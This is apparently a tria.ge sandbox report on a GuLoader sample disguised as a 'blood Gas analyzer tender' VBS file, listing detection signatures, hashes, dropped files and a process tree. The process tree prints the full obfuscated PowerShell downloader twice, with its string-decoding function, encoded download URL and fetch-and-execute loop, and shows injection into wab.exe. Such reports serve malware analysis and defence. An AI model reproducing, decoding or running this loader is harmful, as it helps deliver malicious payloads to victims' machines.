Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

blood Gas ...er.vbs

windows7-x64

10

blood Gas ...er.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    136s
  • max time network
    105s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/06/2024, 06:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    blood Gas analyzer tender.vbs

  • Size

    19KB

  • MD5

    ff267c328cb452fecf9126af29565e92

  • SHA1

    2b64e8e45343ee2adb2cb9f51039da909fa912de

  • SHA256

    db9151a29924eaa6b7fd1f9395d256285deb924445e26cf383ed84722debedef

  • SHA512

    9164f8b9147ec53975cf7a8d694cf04cf82ac430d3c23efc48bc574d3590e1908649c5b17b508fa94ceed08ef7d89310a68b366624a3c7c5c5332b5a7afd33ea

  • SSDEEP

    192:yMgigjO6uXXVex0J/8NrVmb1SWyDG7+8gHkvOUfvnFn61qtHoLg3TaPK:yMgiquXXsxWOr4GDw+PHKOyJrDwK

Score
10/10
guloaderdownloader

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3580
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\blood Gas analyzer tender.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2168
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Mormal = 1;Function Glaze($Adenomatous){$Oecology=$Adenomatous.Length-$Mormal;$bristlemouth='Substring';For( $Foregribes=5;$Foregribes -lt $Oecology;$Foregribes+=6){$Deorganization+=$Adenomatous.$bristlemouth.Invoke( $Foregribes, $Mormal);}$Deorganization;}function Unsincereness($Umbering){ . ($Demiturned) ($Umbering);}$Velarium=Glaze '.estoMHouyho Agonz A,vaiNummelBirsllJutsba prog/Fe.td5Balls.Tonat0Ddbol ,bese(EngarWJo nci BeklnAfmagdFrankoTriplwMultisPairm To,meNP auwTPri.a Che,1 .ynd0 Macr.Meppl0 Hexe; Arbe E.figWRescai Who,nP,rid6Cons.4Neu.o;Tr,nn SankexTrach6 Agri4Indp.;Tr ba Sdvanr ,rknvHen,m:Nedsk1Fil,i2Udsmi1Uddel.Genne0Nylon)V tni SamlGLett.eAgnefcDepo,kHydrooElo u/Gtzsv2Kredi0U.cru1Sabba0Mark.0Radio1P,ion0Corpo1I.cre SpontFSerpii tngerFoisoe,andafNonapoPerioxFlybo/Hjemm1Eberh2.utsp1Law.e.Toils0Side, ';$Esmakkerens105=Glaze 'AkmudUcistesHono,eSpro,ridmme-,iverASphaegConc,eWan.ln CamotKursu ';$Instruktorvagters=Glaze 'En,nth ChrytT.ngltFork,p Brsss,leut:Fyrin/styr /Fo,ekrEfemeiHe,ync st.noencomhOvertlIndigtInterd Subj.Ster,t EnkeoSemelpBlin./UdfldURetronVkiondram,ueTrichr DyopaRegiccbasunt BusteUndeldObsti. benep Bri.fLoka,bFehaa ';$Adjutator=Glaze 'Algin>Kaerl ';$Demiturned=Glaze 'AzinpiEluteePlowgxarbej ';$Skattetrkkenes='Skolebogsforfatterens';$Custlist = Glaze 'Oks.keOutwhcNyttehNe kmoKontr Busc%Her iabundepTi lepV,lnadR.medaklippt SjleaAfskn%Magne\ Gl,sGMite.a BaanrEkserlMinefeT,ica. ArisUHornkdCluefsBusli Plan& Dasy& bogb Post,eUndercSai,ihKjendoPasca winletR deb ';Unsincereness (Glaze 'Pi,pl$ Gas.g Kunsl indto.ellebtwai a Konvl Hy e:Con.eD StaaaBodybnTmrersCurree DuefuBiobisEndelsAgr,seSte a= Sove(,elatc ,athmBismedperm. Rette/ ,ostcChoi Forma$Dec.lC.ofteuEpichsEaglet ,ndelrefeeiPadlosca,unt,revv)Benzi ');Unsincereness (Glaze 'Afkld$Photog UnfrlNit,iosilv,bBolagaTrosklAkutb:Wels.UOversdIc,blfNihill N vvyFrigatPremon enheiColonn,ummygN.npueIns,an Sk,t=Mocam$MoseaIDr abn Isefs TandtIndkorFljlsuRoosekTvetutHeliuoHag srUnmodvFrmanaRichmgScroltMoneyeUdkikrDepreswinte.UnpursSilkspForewlU.plaiKugl,tOrgu,(Udlig$vaqueAFldesd LumpjArb,juBigamtSynona Gougt Ju.aoFyrrer Sabb)Carbu ');$Instruktorvagters=$Udflytningen[0];$gaeld= (Glaze ' B,gn$Kl.engop.ttl.hotooPronob Cytoa heelRegne:UndemO.alveiPandedcab,siSubreuBenedmIneff=UnverN.cripeMappewZeala-,idifO Lu tb S.enj TeateSe.rvc TasstNlden PlowbSPsykoyChillsUnapotAf laeBast,mD.spo.PentaNKrogreUnsnatHayfi.MeninWTilfleProetb LegiCMastolKlagei Scole OmlsnAkt.vt');$gaeld+=$Danseusse[1];Unsincereness ($gaeld);Unsincereness (Glaze 'Gnarr$Ta.ulOBearbiLunerd .etei WastuSpel,m Irid.SkedtHBorgeeForria midndTre,deMatutr orngsTypee[ Impl$Me,neE Tem.safbetmgar,eaHymnok Ensok,nipoeImmotrAnsvae Cov.nTornisDuski1 Pyre0Dunch5Af rg]Gastr=caves$C,culVMarque.djutl Paata K.lir EccliNonpuuMonikmOutcr ');$Mistnk=Glaze ' Pock$.tedfOmaxifi Dy,tdPaaaniR.ftmu Sandm e ua.HomelDHankeoSkraawHullen Dykkl Bra o marsaVand,dOnsigFFrontiHoejhlOrneserefra( ronv$SummeIBegronA.skesMe,brt WachrAnl,suGlosskS hizt Ban,o Anhor C,ntvUnittaVirulgPro,utRearreU.derrOverdsP,rlr,Godmo$FotosS.ootgnMispreRejs.kIndlal.lieddTaarntDisen)Rural ';$Snekldt=$Danseusse[0];Unsincereness (Glaze 'Runke$ NonmgAvenalDrazeoUdvisbemireaFashilKalum:Co reFBraverNotateSalesmEvag sAppoikFre sy Comed dplanAer.si ,rrenUnpergSprg eMet,lrMonet=A.oka(OlefiTBlikde Cents,nsbetsdrr,-DraabPGarlaaAfgrstDydsdhKli.a Tidss$PteroSP litn PrineburlikMeirkl enhidIdokutOpstr)G,raf ');while (!$Fremskydninger) {Unsincereness (Glaze 'Regis$ SolbgDadaslunfreoCe,edbOlig a irellSuper:FireaCEmueruForlorArsenrLuxemiNotateUnaud=Gibbe$VetchtFurb rAfgifu Untuephola ') ;Unsincereness $Mistnk;Unsincereness (Glaze 'ForkoSNat.rtFingeaProverBtte tBas a-StrtaSDwtkrlDecole.upineOnychpSuper li.j4Rimpl ');Unsincereness (Glaze 'P.lyg$ForhagForfrlIldsloNed.rb.lumiaG estlBrac.:KrediF LnforShibbeDuritmCarmasForeskhutchyGrammdBetnknRouseiHjemmnMarlogCircuete.kkr elo=Skumm(TarseTHer uemachssSituatStruk-GloriPSaosha.jalkt S.ephSti l Brand$StutfS,remtnNe.veeperfekaf,rilGarnidPreprtXy,it)subce ') ;Unsincereness (Glaze ' Gome$Detekg regalUn.eroD.omibPo,ybaKennelGrass:TableUKo,trn noxipRateve De acP,vebcTridiaGar ebTendelCoppeeAtwee4River9Sangr=Synt $UterigHjsp.lAt,uno Damgb ParcaFyrtolL.cti: GedeSTvin,aMedbem Sk.tmPikaresvulsnHrsktlSteamiPyntemNavignKogniiGiftsnStorhgHegeleSoubrnZeolis usik+Rov,d+Ksrln% C.is$BadmiU embrdStenhfEvasilBruchyOverdtForjanTermiiRe,agnO.havgNameaes vsmnUng.o.Rebrac rundoNor,euVandknN.nput Ahre ') ;$Instruktorvagters=$Udflytningen[$Unpeccable49];}$Fastlandenes=283013;$Arometrenes=29291;Unsincereness (Glaze 'Unitt$Cyclog Vinil Sweao Aut.bAbradaZ,punl Nond:TyfusaSmerglStrukbF rthuC.iromFrangeFagfoaPa rinFoxto Diver=Kuhni UsminG,edkme Salpt Prin-hamzaCAncieokridhnKullatLorodeUncosnDrivfttawdr Ucent$ForanS,nsvanSemideKardikHend,l BankdEndottSejtr ');Unsincereness (Glaze 'Undis$ BessgArgiflRaaj,oStr kb rummaBaasel G nn:TarrirDov.naLateraBra.hdIrwindNontee.ostst Udd. egre=.rlan Notat[CrushS R.vayBeg.ns JesttSibylePreclmNedsk.FaraoCHypocoGerlynlanisv JurieDyster .atttTraum]Cata,:Amtsr:F.ngrFRaabarSti.loTrinfmHamilBAllotaDeponsOprete Tomm6 Tele4SpidsSEmblet thacrDumpliIchnenEncrogpr la(Wolfi$De,loasmandl Iso,bOplg uPedagmAnthreKon.ta Se en Udle)embry ');Unsincereness (Glaze ' Isaf$MagnagApolllCa eroLggeibstngeaHydrolRisle:.ispesD.cerm.onrel Ska.e Un,hrDyrkeiS.rivsPsych Spon=aaben Nyanz[A.hymSFkaliyPrecosTmrestCuppieMassamP.nag.DemonT Baree igguxUndeltSamst. TretE Cy,nnRevercBullioUgestdAltaniP,stinHardeg.enfa] F,ra:Lime :SnrinA O erSflitiC CruzISengeI Mans. R,oeGRealieUnsavt olorSSynt.tBirgir ComoiRe.irnsuevig.ospi(Spora$Dampnr,ngliaDent.a.ythodbaggrdKarlee Skr tBeefb)Ext a ');Unsincereness (Glaze '.unke$ GaffgExordlPs.udoTrissbBrocaa TilrlSa ta:PersoTVatreeEnweak eptasForp tTetralVaccisLabounMagisiDo atnVi.itgMetroe Relankonto=Impac$Vensts Vivamswi,llfnikeeDags.rDrawniSkolesAloi,. ftesTomleu RepobPupp sF.lfotSubtrr Refei.undanForfrgGleng( ,unk$OvertFNoselaLivebsNonret KnapldetraaContrnL.gnod ImpeePaalin Unime ecosTe ta,Pttpr$NemopA Dr.frArteroempirmNondeeFaulttEksperS.deleSamspnBiol.eVelbesSkrue)A.utb ');Unsincereness $Tekstlsningen;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Garle.Uds && echo t"
          4⤵
            PID:1548
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Mormal = 1;Function Glaze($Adenomatous){$Oecology=$Adenomatous.Length-$Mormal;$bristlemouth='Substring';For( $Foregribes=5;$Foregribes -lt $Oecology;$Foregribes+=6){$Deorganization+=$Adenomatous.$bristlemouth.Invoke( $Foregribes, $Mormal);}$Deorganization;}function Unsincereness($Umbering){ . ($Demiturned) ($Umbering);}$Velarium=Glaze '.estoMHouyho Agonz A,vaiNummelBirsllJutsba prog/Fe.td5Balls.Tonat0Ddbol ,bese(EngarWJo nci BeklnAfmagdFrankoTriplwMultisPairm To,meNP auwTPri.a Che,1 .ynd0 Macr.Meppl0 Hexe; Arbe E.figWRescai Who,nP,rid6Cons.4Neu.o;Tr,nn SankexTrach6 Agri4Indp.;Tr ba Sdvanr ,rknvHen,m:Nedsk1Fil,i2Udsmi1Uddel.Genne0Nylon)V tni SamlGLett.eAgnefcDepo,kHydrooElo u/Gtzsv2Kredi0U.cru1Sabba0Mark.0Radio1P,ion0Corpo1I.cre SpontFSerpii tngerFoisoe,andafNonapoPerioxFlybo/Hjemm1Eberh2.utsp1Law.e.Toils0Side, ';$Esmakkerens105=Glaze 'AkmudUcistesHono,eSpro,ridmme-,iverASphaegConc,eWan.ln CamotKursu ';$Instruktorvagters=Glaze 'En,nth ChrytT.ngltFork,p Brsss,leut:Fyrin/styr /Fo,ekrEfemeiHe,ync st.noencomhOvertlIndigtInterd Subj.Ster,t EnkeoSemelpBlin./UdfldURetronVkiondram,ueTrichr DyopaRegiccbasunt BusteUndeldObsti. benep Bri.fLoka,bFehaa ';$Adjutator=Glaze 'Algin>Kaerl ';$Demiturned=Glaze 'AzinpiEluteePlowgxarbej ';$Skattetrkkenes='Skolebogsforfatterens';$Custlist = Glaze 'Oks.keOutwhcNyttehNe kmoKontr Busc%Her iabundepTi lepV,lnadR.medaklippt SjleaAfskn%Magne\ Gl,sGMite.a BaanrEkserlMinefeT,ica. ArisUHornkdCluefsBusli Plan& Dasy& bogb Post,eUndercSai,ihKjendoPasca winletR deb ';Unsincereness (Glaze 'Pi,pl$ Gas.g Kunsl indto.ellebtwai a Konvl Hy e:Con.eD StaaaBodybnTmrersCurree DuefuBiobisEndelsAgr,seSte a= Sove(,elatc ,athmBismedperm. Rette/ ,ostcChoi Forma$Dec.lC.ofteuEpichsEaglet ,ndelrefeeiPadlosca,unt,revv)Benzi ');Unsincereness (Glaze 'Afkld$Photog UnfrlNit,iosilv,bBolagaTrosklAkutb:Wels.UOversdIc,blfNihill N vvyFrigatPremon enheiColonn,ummygN.npueIns,an Sk,t=Mocam$MoseaIDr abn Isefs TandtIndkorFljlsuRoosekTvetutHeliuoHag srUnmodvFrmanaRichmgScroltMoneyeUdkikrDepreswinte.UnpursSilkspForewlU.plaiKugl,tOrgu,(Udlig$vaqueAFldesd LumpjArb,juBigamtSynona Gougt Ju.aoFyrrer Sabb)Carbu ');$Instruktorvagters=$Udflytningen[0];$gaeld= (Glaze ' B,gn$Kl.engop.ttl.hotooPronob Cytoa heelRegne:UndemO.alveiPandedcab,siSubreuBenedmIneff=UnverN.cripeMappewZeala-,idifO Lu tb S.enj TeateSe.rvc TasstNlden PlowbSPsykoyChillsUnapotAf laeBast,mD.spo.PentaNKrogreUnsnatHayfi.MeninWTilfleProetb LegiCMastolKlagei Scole OmlsnAkt.vt');$gaeld+=$Danseusse[1];Unsincereness ($gaeld);Unsincereness (Glaze 'Gnarr$Ta.ulOBearbiLunerd .etei WastuSpel,m Irid.SkedtHBorgeeForria midndTre,deMatutr orngsTypee[ Impl$Me,neE Tem.safbetmgar,eaHymnok Ensok,nipoeImmotrAnsvae Cov.nTornisDuski1 Pyre0Dunch5Af rg]Gastr=caves$C,culVMarque.djutl Paata K.lir EccliNonpuuMonikmOutcr ');$Mistnk=Glaze ' Pock$.tedfOmaxifi Dy,tdPaaaniR.ftmu Sandm e ua.HomelDHankeoSkraawHullen Dykkl Bra o marsaVand,dOnsigFFrontiHoejhlOrneserefra( ronv$SummeIBegronA.skesMe,brt WachrAnl,suGlosskS hizt Ban,o Anhor C,ntvUnittaVirulgPro,utRearreU.derrOverdsP,rlr,Godmo$FotosS.ootgnMispreRejs.kIndlal.lieddTaarntDisen)Rural ';$Snekldt=$Danseusse[0];Unsincereness (Glaze 'Runke$ NonmgAvenalDrazeoUdvisbemireaFashilKalum:Co reFBraverNotateSalesmEvag sAppoikFre sy Comed dplanAer.si ,rrenUnpergSprg eMet,lrMonet=A.oka(OlefiTBlikde Cents,nsbetsdrr,-DraabPGarlaaAfgrstDydsdhKli.a Tidss$PteroSP litn PrineburlikMeirkl enhidIdokutOpstr)G,raf ');while (!$Fremskydninger) {Unsincereness (Glaze 'Regis$ SolbgDadaslunfreoCe,edbOlig a irellSuper:FireaCEmueruForlorArsenrLuxemiNotateUnaud=Gibbe$VetchtFurb rAfgifu Untuephola ') ;Unsincereness $Mistnk;Unsincereness (Glaze 'ForkoSNat.rtFingeaProverBtte tBas a-StrtaSDwtkrlDecole.upineOnychpSuper li.j4Rimpl ');Unsincereness (Glaze 'P.lyg$ForhagForfrlIldsloNed.rb.lumiaG estlBrac.:KrediF LnforShibbeDuritmCarmasForeskhutchyGrammdBetnknRouseiHjemmnMarlogCircuete.kkr elo=Skumm(TarseTHer uemachssSituatStruk-GloriPSaosha.jalkt S.ephSti l Brand$StutfS,remtnNe.veeperfekaf,rilGarnidPreprtXy,it)subce ') ;Unsincereness (Glaze ' Gome$Detekg regalUn.eroD.omibPo,ybaKennelGrass:TableUKo,trn noxipRateve De acP,vebcTridiaGar ebTendelCoppeeAtwee4River9Sangr=Synt $UterigHjsp.lAt,uno Damgb ParcaFyrtolL.cti: GedeSTvin,aMedbem Sk.tmPikaresvulsnHrsktlSteamiPyntemNavignKogniiGiftsnStorhgHegeleSoubrnZeolis usik+Rov,d+Ksrln% C.is$BadmiU embrdStenhfEvasilBruchyOverdtForjanTermiiRe,agnO.havgNameaes vsmnUng.o.Rebrac rundoNor,euVandknN.nput Ahre ') ;$Instruktorvagters=$Udflytningen[$Unpeccable49];}$Fastlandenes=283013;$Arometrenes=29291;Unsincereness (Glaze 'Unitt$Cyclog Vinil Sweao Aut.bAbradaZ,punl Nond:TyfusaSmerglStrukbF rthuC.iromFrangeFagfoaPa rinFoxto Diver=Kuhni UsminG,edkme Salpt Prin-hamzaCAncieokridhnKullatLorodeUncosnDrivfttawdr Ucent$ForanS,nsvanSemideKardikHend,l BankdEndottSejtr ');Unsincereness (Glaze 'Undis$ BessgArgiflRaaj,oStr kb rummaBaasel G nn:TarrirDov.naLateraBra.hdIrwindNontee.ostst Udd. egre=.rlan Notat[CrushS R.vayBeg.ns JesttSibylePreclmNedsk.FaraoCHypocoGerlynlanisv JurieDyster .atttTraum]Cata,:Amtsr:F.ngrFRaabarSti.loTrinfmHamilBAllotaDeponsOprete Tomm6 Tele4SpidsSEmblet thacrDumpliIchnenEncrogpr la(Wolfi$De,loasmandl Iso,bOplg uPedagmAnthreKon.ta Se en Udle)embry ');Unsincereness (Glaze ' Isaf$MagnagApolllCa eroLggeibstngeaHydrolRisle:.ispesD.cerm.onrel Ska.e Un,hrDyrkeiS.rivsPsych Spon=aaben Nyanz[A.hymSFkaliyPrecosTmrestCuppieMassamP.nag.DemonT Baree igguxUndeltSamst. TretE Cy,nnRevercBullioUgestdAltaniP,stinHardeg.enfa] F,ra:Lime :SnrinA O erSflitiC CruzISengeI Mans. R,oeGRealieUnsavt olorSSynt.tBirgir ComoiRe.irnsuevig.ospi(Spora$Dampnr,ngliaDent.a.ythodbaggrdKarlee Skr tBeefb)Ext a ');Unsincereness (Glaze '.unke$ GaffgExordlPs.udoTrissbBrocaa TilrlSa ta:PersoTVatreeEnweak eptasForp tTetralVaccisLabounMagisiDo atnVi.itgMetroe Relankonto=Impac$Vensts Vivamswi,llfnikeeDags.rDrawniSkolesAloi,. ftesTomleu RepobPupp sF.lfotSubtrr Refei.undanForfrgGleng( ,unk$OvertFNoselaLivebsNonret KnapldetraaContrnL.gnod ImpeePaalin Unime ecosTe ta,Pttpr$NemopA Dr.frArteroempirmNondeeFaulttEksperS.deleSamspnBiol.eVelbesSkrue)A.utb ');Unsincereness $Tekstlsningen;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1936
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Garle.Uds && echo t"
              5⤵
                PID:2396
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                5⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:5020
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 216
                  6⤵
                  • Program crash
                  PID:2468
        • C:\Windows\SysWOW64\net.exe
          "C:\Windows\SysWOW64\net.exe"
          2⤵
            PID:4136
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5020 -ip 5020
          1⤵
            PID:3040

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5nsncxay.3c4.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Garle.Uds
            Filesize

            406KB

            MD5

            0f461f618bf51b8108fae07fe2f3b7a7

            SHA1

            0c756e48c06ca86ba6bb68b93ed3edf2b9866299

            SHA256

            3b0f399980a40a29429f39f9e09c068738812a9078672e48c145aa0465526f78

            SHA512

            4c8e9cc48fdd8fa4b5e93fd22f15530627de38d9ebc54689549c95d78500262ebd8ecdc29a176769a476d17f14c5907a8786046fbb05de81838c98bdef0541bf

            Download Submit

          • memory/980-1-0x000001E5B7C40000-0x000001E5B7C62000-memory.dmp

            Filesize

            136KB

            Download

          • memory/980-11-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/980-12-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/980-45-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/980-0-0x00007FFDAE393000-0x00007FFDAE395000-memory.dmp

            Filesize

            8KB

            Download

          • memory/980-41-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/980-40-0x00007FFDAE393000-0x00007FFDAE395000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1936-16-0x0000000005130000-0x0000000005758000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/1936-35-0x0000000007290000-0x00000000072B2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1936-30-0x0000000006040000-0x000000000605E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/1936-31-0x0000000006070000-0x00000000060BC000-memory.dmp

            Filesize

            304KB

            Download

          • memory/1936-32-0x00000000078B0000-0x0000000007F2A000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/1936-33-0x00000000065F0000-0x000000000660A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/1936-34-0x0000000007300000-0x0000000007396000-memory.dmp

            Filesize

            600KB

            Download

          • memory/1936-27-0x0000000005A70000-0x0000000005DC4000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/1936-36-0x00000000084E0000-0x0000000008A84000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/1936-19-0x0000000005A00000-0x0000000005A66000-memory.dmp

            Filesize

            408KB

            Download

          • memory/1936-38-0x0000000008A90000-0x000000000CC4D000-memory.dmp

            Filesize

            65.7MB

            Download

          • memory/1936-18-0x0000000005990000-0x00000000059F6000-memory.dmp

            Filesize

            408KB

            Download

          • memory/1936-17-0x00000000050A0000-0x00000000050C2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1936-15-0x0000000004AC0000-0x0000000004AF6000-memory.dmp

            Filesize

            216KB

            Download

          • memory/5020-42-0x0000000001000000-0x00000000051BD000-memory.dmp

            Filesize

            65.7MB

            Download

          • memory/5020-51-0x0000000001000000-0x00000000051BD000-memory.dmp

            Filesize

            65.7MB

            Download